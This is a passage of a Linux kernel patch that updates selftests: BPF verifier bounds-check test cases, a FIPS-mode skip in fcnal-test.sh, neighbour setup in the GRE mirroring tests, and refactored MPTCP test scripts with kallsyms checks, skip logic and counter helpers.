++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -278,20 +292,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 12",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -6),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -303,20 +318,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 13",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 2),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -331,7 +347,7 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+@@ -340,13 +356,14 @@
+ 	.insns = {
+ 	BPF_LDX_MEM(BPF_W, BPF_REG_9, BPF_REG_1,
+ 		    offsetof(struct __sk_buff, mark)),
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_MOV64_IMM(BPF_REG_8, 2),
+@@ -360,20 +377,21 @@
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, -3),
+ 	BPF_JMP_IMM(BPF_JA, 0, 0, -7),
+ 	},
+-	.fixup_map_hash_8b = { 4 },
++	.fixup_map_hash_8b = { 6 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 15",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 4),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 3),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -6),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -387,7 +405,7 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 969647228817b..c6a8c732b8021 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -104,13 +104,6 @@
+ 	#else
+ 		#define __NR_mount_setattr 442
+ 	#endif
+-
+-struct mount_attr {
+-	__u64 attr_set;
+-	__u64 attr_clr;
+-	__u64 propagation;
+-	__u64 userns_fd;
+-};
+ #endif
+ 
+ #ifndef __NR_open_tree
+diff --git a/tools/testing/selftests/net/fcnal-test.sh b/tools/testing/selftests/net/fcnal-test.sh
+index 21ca91473c095..ee6880ac3e5ed 100755
+--- a/tools/testing/selftests/net/fcnal-test.sh
++++ b/tools/testing/selftests/net/fcnal-test.sh
+@@ -92,6 +92,13 @@ NSC_CMD="ip netns exec ${NSC}"
+ 
+ which ping6 > /dev/null 2>&1 && ping6=$(which ping6) || ping6=$(which ping)
+ 
++# Check if FIPS mode is enabled
++if [ -f /proc/sys/crypto/fips_enabled ]; then
++	fips_enabled=`cat /proc/sys/crypto/fips_enabled`
++else
++	fips_enabled=0
++fi
++
+ ################################################################################
+ # utilities
+ 
+@@ -1216,7 +1223,7 @@ ipv4_tcp_novrf()
+ 	run_cmd nettest -d ${NSA_DEV} -r ${a}
+ 	log_test_addr ${a} $? 1 "No server, device client, local conn"
+ 
+-	ipv4_tcp_md5_novrf
++	[ "$fips_enabled" = "1" ] || ipv4_tcp_md5_novrf
+ }
+ 
+ ipv4_tcp_vrf()
+@@ -1270,9 +1277,11 @@ ipv4_tcp_vrf()
+ 	log_test_addr ${a} $? 1 "Global server, local connection"
+ 
+ 	# run MD5 tests
+-	setup_vrf_dup
+-	ipv4_tcp_md5
+-	cleanup_vrf_dup
++	if [ "$fips_enabled" = "0" ]; then
++		setup_vrf_dup
++		ipv4_tcp_md5
++		cleanup_vrf_dup
++	fi
+ 
+ 	#
+ 	# enable VRF global server
+@@ -2772,7 +2781,7 @@ ipv6_tcp_novrf()
+ 		log_test_addr ${a} $? 1 "No server, device client, local conn"
+ 	done
+ 
+-	ipv6_tcp_md5_novrf
++	[ "$fips_enabled" = "1" ] || ipv6_tcp_md5_novrf
+ }
+ 
+ ipv6_tcp_vrf()
+@@ -2842,9 +2851,11 @@ ipv6_tcp_vrf()
+ 	log_test_addr ${a} $? 1 "Global server, local connection"
+ 
+ 	# run MD5 tests
+-	setup_vrf_dup
+-	ipv6_tcp_md5
+-	cleanup_vrf_dup
++	if [ "$fips_enabled" = "0" ]; then
++		setup_vrf_dup
++		ipv6_tcp_md5
++		cleanup_vrf_dup
++	fi
+ 
+ 	#
+ 	# enable VRF global server
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
+index c5095da7f6bf8..aec752a22e9ec 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
+@@ -93,12 +93,16 @@ cleanup()
+ 
+ test_gretap()
+ {
++	ip neigh replace 192.0.2.130 lladdr $(mac_get $h3) \
++		 nud permanent dev br2
+ 	full_test_span_gre_dir gt4 ingress 8 0 "mirror to gretap"
+ 	full_test_span_gre_dir gt4 egress 0 8 "mirror to gretap"
+ }
+ 
+ test_ip6gretap()
+ {
++	ip neigh replace 2001:db8:2::2 lladdr $(mac_get $h3) \
++		nud permanent dev br2
+ 	full_test_span_gre_dir gt6 ingress 8 0 "mirror to ip6gretap"
+ 	full_test_span_gre_dir gt6 egress 0 8 "mirror to ip6gretap"
+ }
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
+index 9ff22f28032dd..0cf4c47a46f9b 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
+@@ -90,12 +90,16 @@ cleanup()
+ 
+ test_gretap()
+ {
++	ip neigh replace 192.0.2.130 lladdr $(mac_get $h3) \
++		 nud permanent dev br1
+ 	full_test_span_gre_dir gt4 ingress 8 0 "mirror to gretap"
+ 	full_test_span_gre_dir gt4 egress 0 8 "mirror to gretap"
+ }
+ 
+ test_ip6gretap()
+ {
++	ip neigh replace 2001:db8:2::2 lladdr $(mac_get $h3) \
++		nud permanent dev br1
+ 	full_test_span_gre_dir gt6 ingress 8 0 "mirror to ip6gretap"
+ 	full_test_span_gre_dir gt6 egress 0 8 "mirror to ip6gretap"
+ }
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index 38021a0dd5276..6032f9b23c4c2 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -1,3 +1,4 @@
++CONFIG_KALLSYMS=y
+ CONFIG_MPTCP=y
+ CONFIG_IPV6=y
+ CONFIG_MPTCP_IPV6=y
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index dd730a35bd128..400cf1ce96e31 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -42,27 +42,39 @@ fi
+ 
+ __chk_nr()
+ {
+-	local condition="$1"
++	local command="$1"
+ 	local expected=$2
+-	local msg nr
++	local msg="$3"
++	local skip="${4:-SKIP}"
++	local nr
+ 
+-	shift 2
+-	msg=$*
+-	nr=$(ss -inmHMN $ns | $condition)
++	nr=$(eval $command)
+ 
+ 	printf "%-50s" "$msg"
+ 	if [ $nr != $expected ]; then
+-		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
++		if [ $nr = "$skip" ] && ! mptcp_lib_expect_all_features; then
++			echo "[ skip ] Feature probably not supported"
++		else
++			echo "[ fail ] expected $expected found $nr"
++			ret=$test_cnt
++		fi
+ 	else
+ 		echo "[  ok  ]"
+ 	fi
+ 	test_cnt=$((test_cnt+1))
+ }
+ 
++__chk_msk_nr()
++{
++	local condition=$1
++	shift 1
++
++	__chk_nr "ss -inmHMN $ns | $condition" "$@"
++}
++
+ chk_msk_nr()
+ {
+-	__chk_nr "grep -c token:" $*
++	__chk_msk_nr "grep -c token:" "$@"
+ }
+ 
+ wait_msk_nr()
+@@ -100,37 +112,26 @@ wait_msk_nr()
+ 
+ chk_msk_fallback_nr()
+ {
+-		__chk_nr "grep -c fallback" $*
++	__chk_msk_nr "grep -c fallback" "$@"
+ }
+ 
+ chk_msk_remote_key_nr()
+ {
+-		__chk_nr "grep -c remote_key" $*
++	__chk_msk_nr "grep -c remote_key" "$@"
+ }
+ 
+ __chk_listen()
+ {
+ 	local filter="$1"
+ 	local expected=$2
++	local msg="$3"
+ 
+-	shift 2
+-	msg=$*
+-
+-	nr=$(ss -N $ns -Ml "$filter" | grep -c LISTEN)
+-	printf "%-50s" "$msg"
+-
+-	if [ $nr != $expected ]; then
+-		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
+-	else
+-		echo "[  ok  ]"
+-	fi
++	__chk_nr "ss -N $ns -Ml '$filter' | grep -c LISTEN" "$expected" "$msg" 0
+ }
+ 
+ chk_msk_listen()
+ {
+ 	lport=$1
+-	local msg="check for listen socket"
+ 
+ 	# destination port search should always return empty list
+ 	__chk_listen "dport $lport" 0 "listen match for dport $lport"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index e54653ea2ed4f..7df6b9b6f9a84 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -98,8 +98,8 @@ static struct cfg_sockopt_types cfg_sockopt_types;
+ static void die_usage(void)
+ {
+ 	fprintf(stderr, "Usage: mptcp_connect [-6] [-c cmsg] [-f offset] [-i file] [-I num] [-j] [-l] "
+-		"[-m mode] [-M mark] [-o option] [-p port] [-P mode] [-j] [-l] [-r num] "
+-		"[-s MPTCP|TCP] [-S num] [-r num] [-t num] [-T num] [-u] [-w sec] connect_address\n");
++		"[-m mode] [-M mark] [-o option] [-p port] [-P mode] [-r num] [-R num] "
++		"[-s MPTCP|TCP] [-S num] [-t num] [-T num] [-w sec] connect_address\n");
+ 	fprintf(stderr, "\t-6 use ipv6\n");
+ 	fprintf(stderr, "\t-c cmsg -- test cmsg type <cmsg>\n");
+ 	fprintf(stderr, "\t-f offset -- stop the I/O after receiving and sending the specified amount "
+@@ -118,13 +118,13 @@ static void die_usage(void)
+ 	fprintf(stderr, "\t-p num -- use port num\n");
+ 	fprintf(stderr,
+ 		"\t-P [saveWithPeek|saveAfterPeek] -- save data with/after MSG_PEEK form tcp socket\n");
+-	fprintf(stderr, "\t-t num -- set poll timeout to num\n");
+-	fprintf(stderr, "\t-T num -- set expected runtime to num ms\n");
+ 	fprintf(stderr, "\t-r num -- enable slow mode, limiting each write to num bytes "
+ 		"-- for remove addr tests\n");
+ 	fprintf(stderr, "\t-R num -- set SO_RCVBUF to num\n");
+ 	fprintf(stderr, "\t-s [MPTCP|TCP] -- use mptcp(default) or tcp sockets\n");
+ 	fprintf(stderr, "\t-S num -- set SO_SNDBUF to num\n");
++	fprintf(stderr, "\t-t num -- set poll timeout to num\n");
++	fprintf(stderr, "\t-T num -- set expected runtime to num ms\n");
+ 	fprintf(stderr, "\t-w num -- wait num sec before closing the socket\n");
+ 	exit(1);
+ }
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index c923ce5ff6eb7..36dc2bab7a13c 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -144,6 +144,7 @@ cleanup()
+ }
+ 
+ mptcp_lib_check_mptcp
++mptcp_lib_check_kallsyms
+ 
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+@@ -696,6 +697,15 @@ run_test_transparent()
+ 		return 0
+ 	fi
+ 
++	# IP(V6)_TRANSPARENT has been added after TOS support which came with
++	# the required infrastructure in MPTCP sockopt code. To support TOS, the
++	# following function has been exported (T). Not great but better than
++	# checking for a specific kernel version.
++	if ! mptcp_lib_kallsyms_has "T __ip_sock_set_tos$"; then
++		echo "INFO: ${msg} not supported by the kernel: SKIP"
++		return
++	fi
++
+ ip netns exec "$listener_ns" nft -f /dev/stdin <<"EOF"
+ flush ruleset
+ table inet mangle {
+@@ -772,6 +782,11 @@ run_tests_disconnect()
+ 	local old_cin=$cin
+ 	local old_sin=$sin
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_pm_data_reset$"; then
++		echo "INFO: Full disconnect not supported: SKIP"
++		return
++	fi
++
+ 	cat $cin $cin $cin > "$cin".disconnect
+ 
+ 	# force do_transfer to cope with the multiple tranmissions
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 6be19b1038243..7b65003ee8cff 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -8,6 +8,10 @@
+ 
+ . "$(dirname "${0}")/mptcp_lib.sh"
+ 
++# ShellCheck incorrectly believes that most of the code here is unreachable
++# because it's invoked by variable name, see how the "tests" array is used
++#shellcheck disable=SC2317
++
+ ret=0
+ sin=""
+ sinfail=""
+@@ -21,6 +25,8 @@ capout=""
+ ns1=""
+ ns2=""
+ ksft_skip=4
++iptables="iptables"
++ip6tables="ip6tables"
+ timeout_poll=30
+ timeout_test=$((timeout_poll * 2 + 1))
+ capture=0
+@@ -73,7 +79,7 @@ init_partial()
+ 		ip netns add $netns || exit $ksft_skip
+ 		ip -net $netns link set lo up
+ 		ip netns exec $netns sysctl -q net.mptcp.enabled=1
+-		ip netns exec $netns sysctl -q net.mptcp.pm_type=0
++		ip netns exec $netns sysctl -q net.mptcp.pm_type=0 2>/dev/null || true
+ 		ip netns exec $netns sysctl -q net.ipv4.conf.all.rp_filter=0
+ 		ip netns exec $netns sysctl -q net.ipv4.conf.default.rp_filter=0
+ 		if [ $checksum -eq 1 ]; then
+@@ -131,13 +137,18 @@ cleanup_partial()
+ check_tools()
+ {
+ 	mptcp_lib_check_mptcp
++	mptcp_lib_check_kallsyms
+ 
+ 	if ! ip -Version &> /dev/null; then
+ 		echo "SKIP: Could not run test without ip tool"
+ 		exit $ksft_skip
+ 	fi
+ 
+-	if ! iptables -V &> /dev/null; then
++	# Use the legacy version if available to support old kernel versions
++	if iptables-legacy -V &> /dev/null; then
++		iptables="iptables-legacy"
++		ip6tables="ip6tables-legacy"
++	elif ! iptables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without iptables tool"
+ 		exit $ksft_skip
+ 	fi
+@@ -173,6 +184,32 @@ cleanup()
+ 	cleanup_partial
+ }
+ 
++# $1: msg
++print_title()
++{
++	printf "%03u %-36s %s" "${TEST_COUNT}" "${TEST_NAME}" "${1}"
++}
++
++# [ $1: fail msg ]
++mark_as_skipped()
++{
++	local msg="${1:-"Feature not supported"}"
++
++	mptcp_lib_fail_if_expected_feature "${msg}"
++
++	print_title "[ skip ] ${msg}"
++	printf "\n"
++}
++
++# $@: condition
++continue_if()
++{
++	if ! "${@}"; then
++		mark_as_skipped
++		return 1
++	fi
++}
++
+ skip_test()
+ {
+ 	if [ "${#only_tests_ids[@]}" -eq 0 ] && [ "${#only_tests_names[@]}" -eq 0 ]; then
+@@ -216,6 +253,19 @@ reset()
+ 	return 0
+ }
+ 
++# $1: test name ; $2: counter to check
++reset_check_counter()
++{
++	reset "${1}" || return 1
++
++	local counter="${2}"
++
++	if ! nstat -asz "${counter}" | grep -wq "${counter}"; then
++		mark_as_skipped "counter '${counter}' is not available"
++		return 1
++	fi
++}
++
+ # $1: test name
+ reset_with_cookies()
+ {
+@@ -235,17 +285,21 @@ reset_with_add_addr_timeout()
+ 
+ 	reset "${1}" || return 1
+ 
+-	tables="iptables"
++	tables="${iptables}"
+ 	if [ $ip -eq 6 ]; then
+-		tables="ip6tables"
++		tables="${ip6tables}"
+ 	fi
+ 
+ 	ip netns exec $ns1 sysctl -q net.mptcp.add_addr_timeout=1
+-	ip netns exec $ns2 $tables -A OUTPUT -p tcp \
+-		-m tcp --tcp-option 30 \
+-		-m bpf --bytecode \
+-		"$CBPF_MPTCP_SUBOPTION_ADD_ADDR" \
+-		-j DROP
++
++	if ! ip netns exec $ns2 $tables -A OUTPUT -p tcp \
++			-m tcp --tcp-option 30 \
++			-m bpf --bytecode \
++			"$CBPF_MPTCP_SUBOPTION_ADD_ADDR" \
++			-j DROP; then
++		mark_as_skipped "unable to set the 'add addr' rule"
++		return 1
++	fi
+ }
+ 
+ # $1: test name
+@@ -289,22 +343,17 @@ reset_with_allow_join_id0()
+ #     tc action pedit offset 162 out of bounds
+ #
+ # Netfilter is used to mark packets with enough data.
+-reset_with_fail()
++setup_fail_rules()
+ {
+-	reset "${1}" || return 1
+-
+-	ip netns exec $ns1 sysctl -q net.mptcp.checksum_enabled=1
+-	ip netns exec $ns2 sysctl -q net.mptcp.checksum_enabled=1
+-
+ 	check_invert=1
+ 	validate_checksum=1
+-	local i="$2"
+-	local ip="${3:-4}"
++	local i="$1"
++	local ip="${2:-4}"
+ 	local tables
+ 
+-	tables="iptables"
++	tables="${iptables}"
+ 	if [ $ip -eq 6 ]; then
+-		tables="ip6tables"
++		tables="${ip6tables}"
+ 	fi
+ 
+ 	ip netns exec $ns2 $tables \
+@@ -314,15 +363,51 @@ reset_with_fail()
+ 		-p tcp \
+ 		-m length --length 150:9999 \
+ 		-m statistic --mode nth --packet 1 --every 99999 \
+-		-j MARK --set-mark 42 || exit 1
++		-j MARK --set-mark 42 || return ${ksft_skip}
+ 
+-	tc -n $ns2 qdisc add dev ns2eth$i clsact || exit 1
++	tc -n $ns2 qdisc add dev ns2eth$i clsact || return ${ksft_skip}
+ 	tc -n $ns2 filter add dev ns2eth$i egress \
+ 		protocol ip prio 1000 \
+ 		handle 42 fw \
+ 		action pedit munge offset 148 u8 invert \
+ 		pipe csum tcp \
+-		index 100 || exit 1
++		index 100 || return ${ksft_skip}
++}
++
++reset_with_fail()
++{
++	reset_check_counter "${1}" "MPTcpExtInfiniteMapTx" || return 1
++	shift
++
++	ip netns exec $ns1 sysctl -q net.mptcp.checksum_enabled=1
++	ip netns exec $ns2 sysctl -q net.mptcp.checksum_enabled=1
++
++	local rc=0
++	setup_fail_rules "${@}" || rc=$?
++
++	if [ ${rc} -eq ${ksft_skip} ]; then
++		mark_as_skipped "unable to set the 'fail' rules"
++		return 1
++	fi
++}
++
++reset_with_tcp_filter()
++{
++	reset "${1}" || return 1
++	shift
++
++	local ns="${!1}"
++	local src="${2}"
++	local target="${3}"
++
++	if ! ip netns exec "${ns}" ${iptables} \
++			-A INPUT \
++			-s "${src}" \
++			-p tcp \
++			-j "${target}"; then
++		mark_as_skipped "unable to set the filter rules"
++		return 1
++	fi
+ }
+ 
+ fail_test()
+@@ -357,8 +442,9 @@ check_transfer()
+ 
+ 	local line
+ 	if [ -n "$bytes" ]; then
++		local out_size
+ 		# when truncating we must check the size explicitly
+-		local out_size=$(wc -c $out | awk '{print $1}')
++		out_size=$(wc -c $out | awk '{print $1}')
+ 		if [ $out_size -ne $bytes ]; then
+ 			echo "[ FAIL ] $what output file has wrong size ($out_size, $bytes)"
+ 			fail_test
+@@ -442,11 +528,25 @@ wait_local_port_listen()
+ 	done
+ }
+ 
+-rm_addr_count()
++# $1: ns ; $2: counter
++get_counter()
+ {
+-	local ns=${1}
++	local ns="${1}"
++	local counter="${2}"
++	local count
++
++	count=$(ip netns exec ${ns} nstat -asz "${counter}" | awk 'NR==1 {next} {print $2}')
++	if [ -z "${count}" ]; then
++		mptcp_lib_fail_if_expected_feature "${counter} counter"
++		return 1
++	fi
+ 
+-	ip netns exec ${ns} nstat -as | grep MPTcpExtRmAddr | awk '{print $2}'
++	echo "${count}"
++}
++
++rm_addr_count()
++{
++	get_counter "${1}" "MPTcpExtRmAddr"
+ }
+ 
+ # $1: ns, $2: old rm_addr counter in $ns
+@@ -469,11 +569,11 @@ wait_mpj()
+ 	local ns="${1}"
+ 	local cnt old_cnt
+ 
+-	old_cnt=$(ip netns exec ${ns} nstat -as | grep MPJoinAckRx | awk '{print $2}')
++	old_cnt=$(get_counter ${ns} "MPTcpExtMPJoinAckRx")
+ 
+ 	local i
+ 	for i in $(seq 10); do
+-		cnt=$(ip netns exec ${ns} nstat -as | grep MPJoinAckRx | awk '{print $2}')
++		cnt=$(get_counter ${ns} "MPTcpExtMPJoinAckRx")
+ 		[ "$cnt" = "${old_cnt}" ] || break
+ 		sleep 0.1
+ 	done
+@@ -487,6 +587,7 @@ kill_wait()
+ 
+ kill_tests_wait()
+ {
++	#shellcheck disable=SC2046
+ 	kill -SIGUSR1 $(ip netns pids $ns2) $(ip netns pids $ns1)
+ 	wait
+ }
+@@ -666,15 +767,6 @@ pm_nl_check_endpoint()
+ 	fi
+ }
+ 
+-filter_tcp_from()
+-{
+-	local ns="${1}"
+-	local src="${2}"
+-	local target="${3}"
+-
+-	ip netns exec "${ns}" iptables -A INPUT -s "${src}" -p tcp -j "${target}"
+-}
+-
+ do_transfer()
+ {
+ 	local listener_ns="$1"
+@@ -854,11 +946,12 @@ do_transfer()
+ 				sp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				da=$(grep "type:10" "$evts_ns1" |
+-				     sed -n 's/.*\(daddr6:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				     sed -n 's/.*\(daddr[46]:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				echo "$da" | grep -q ":" && addr="::ffff:$addr"
+ 				dp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
+-				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "::ffff:$addr" \
++				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "$addr" \
+ 							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+@@ -1152,12 +1245,13 @@ chk_csum_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "sum"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtDataCsumErr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns1} "MPTcpExtDataCsumErr")
+ 	if [ "$count" != "$csum_ns1" ]; then
+ 		extra_msg="$extra_msg ns1=$count"
+ 	fi
+-	if { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
+ 	   { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns1"
+ 		fail_test
+@@ -1166,12 +1260,13 @@ chk_csum_nr()
+ 		echo -n "[ ok ]"
+ 	fi
+ 	echo -n " - csum  "
+-	count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtDataCsumErr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns2} "MPTcpExtDataCsumErr")
+ 	if [ "$count" != "$csum_ns2" ]; then
+ 		extra_msg="$extra_msg ns2=$count"
+ 	fi
+-	if { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
+ 	   { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns2"
+ 		fail_test
+@@ -1213,12 +1308,13 @@ chk_fail_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "ftx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPFailTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns_tx} "MPTcpExtMPFailTx")
